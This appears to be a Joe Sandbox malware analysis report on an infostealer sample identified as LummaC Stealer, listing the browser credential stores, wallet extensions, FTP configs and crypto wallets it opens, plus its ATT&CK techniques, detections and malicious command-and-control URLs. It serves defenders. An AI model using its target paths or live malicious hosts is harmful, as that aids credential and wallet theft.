Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1336629907.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1336085175.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1383847377.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1310755085.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1311800277.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1359632994.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1359202911.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1386704934.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1359393322.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5380, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 5380, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	34 Virtualization/Sandbox Evasion	2 OS Credential Dumping	761 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	34 Virtualization/Sandbox Evasion	Remote Desktop Protocol	4 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	223 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	39%	ReversingLabs	Win32.Trojan.Symmi
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://occupy-blushi.sbs/5	100%	Avira URL Cloud	malware
https://occupy-blushi.sbs/apintel	100%	Avira URL Cloud	malware
http://crl.microh	0%	Avira URL Cloud	safe
https://occupy-blushi.sbs/api46k	100%	Avira URL Cloud	malware
https://occupy-blushi.sbs/apie	100%	Avira URL Cloud	malware
https://occupy-blushi.sbs/api?k	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
occupy-blushi.sbs	172.67.187.240	true	false	high
property-imper.sbs	unknown	unknown	false	high
frogs-severz.sbs	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://occupy-blushi.sbs/api	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false		high
https://occupy-blushi.sbs/	file.exe, 00000000.00000003.1491953508.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1492796351.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1494390752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1415146010.0000000000806000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1415016129.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microh	file.exe, 00000000.00000003.1491953508.00000000007DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://occupy-blushi.sbs/apintel	file.exe, 00000000.00000003.1491953508.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1492796351.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1494390752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://occupy-blushi.sbs/apie	file.exe, 00000000.00000003.1383847377.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.1360495340.000000000575C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false		high
https://occupy-blushi.sbs/api46k	file.exe, 00000000.00000002.1494469265.0000000000805000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432900868.0000000000804000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432784543.0000000000803000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.1360495340.000000000575C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://occupy-blushi.sbs/5	file.exe, 00000000.00000003.1491953508.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1492796351.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1494390752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://occupy-blushi.sbs/api?k	file.exe, 00000000.00000002.1494469265.0000000000805000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432900868.0000000000804000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1415146010.0000000000806000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432784543.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1415016129.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.187.240	occupy-blushi.sbs	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562727
Start date and time:	2024-11-25 23:33:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@3/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
17:34:06	API Interceptor	9x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.187.240	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
occupy-blushi.sbs	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, Vidar	Browse	104.21.7.169
	file.exe	Get hash	malicious	Unknown	Browse	104.21.7.169
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.67.187.240
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.187.240
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.7.169
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
